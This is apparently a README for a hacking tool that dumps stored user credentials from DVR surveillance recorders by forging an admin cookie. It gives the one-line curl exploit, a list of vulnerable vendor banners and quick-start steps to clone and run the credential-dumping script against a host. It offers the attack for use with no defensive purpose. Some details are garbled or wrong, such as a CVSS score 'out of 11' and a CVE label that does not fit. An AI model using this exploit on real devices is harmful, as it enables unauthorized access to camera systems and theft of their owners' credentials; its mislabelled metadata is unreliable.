DVR-HACKING-HACK4LX
[Tool] show DVR Credentiales
[*] Exploit Title: "DVR-HACKING-HACK4LX"
[*] CVE: 2018-2019
[*] CVSS Base Score v3: 7.5 / 11
[*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
[*] Date: 04/25/2019
[*] Exploit Author: ʍ4ղíƒҽՏԵ0 ϲվҍҽɾ ՏҽϲմɾíԵվ Եҽɑʍ ( https://t.me/hack4lx )
![DVR-HACKING-HACK4LX] (http://uupload.ir/files/ytf_google_1.png)
Exploit:
$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
tested in DVR (banner/vendor ?):
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MDVR Login
On the Wild:
Possible Banners frontend (web):
Indoor:
TOOL: "Show all DVR Credentials"
Quick start
usr@pwn:~$ git clone https://github.com/attakercyebr/hack4lx_CVE-2018-2019
usr@pwn:~$ cd hack4lx_CVE-2018-2019.py
usr@pwn:~$ pip install -r requirements.txt
help
usage: hack4lx_CVE-2018-2019.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining Exposed credentials
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python hack4lx_CVE-2018-2019.py --host 192.168.1.101 -p 81
Description
Title
Author
Aate
Version
Usage
👇🏾👇🏾👇🏾👇🏾👇🏾
✯ Follow Me On